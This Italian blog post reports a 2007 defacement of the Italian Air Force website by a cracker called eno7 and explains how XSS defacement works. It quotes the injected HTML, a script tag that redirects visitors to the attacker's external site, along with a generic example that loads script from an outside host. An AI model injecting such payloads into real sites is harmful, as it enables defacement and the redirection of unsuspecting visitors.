Defacement ai danni del sito dell’Aeronautica Militare Italiana

Nella serata del 26 Gennaio è stato notificato a Zone-H un defacement ai danni del portale Web dell’Aeronautica Militare Italiana.

Un cracker turco, con il nick eno7, ha sfruttato una SQL Injection, per condurre un XSS defacement.
Un XSS defacement consiste nell’iniettare codice Javascript all’interno della pagina per modificarla dinamicamente o per redirezionare il visitatore verso un sito Web esterno. Ci sono vari modi per inserire funzioni o codice Javscript ad esempio il più classico e meno elaborato è <script src=”http://path.to/the/script.js”></script>.
E’ chiaro che molte volte, scovando XSS in variabili che valorizzeranno opzioni di tag HTML è necessario usare caratteri di escape o particolari codifiche alafanumeriche.

In questo caso il cracker ha inserito il codice in questo modo:

<img src=”/img/home_page/freccia.gif”
border=”0″>&nbsp;&nbsp;<a
href=”/sitoam/default.asp?idSez=33&idente=1400&idArg=&idNot=17222″
title=”Scade il
29/01/2007″><script>location=”http://www.eno7.org/peace/peace. html”</script></a>

Il cracker ha utilizzato l’attributo location per reindirizzare i visitatori verso http://www.eno7.org/peace/peace.html
In questo momento il Web Server dell’Aeronautica risulta down. Il deface può essere visto grazie al mirror di Zone-H.

 

Nessun Commento.. Puoi essere il primo!

Lascia un Commento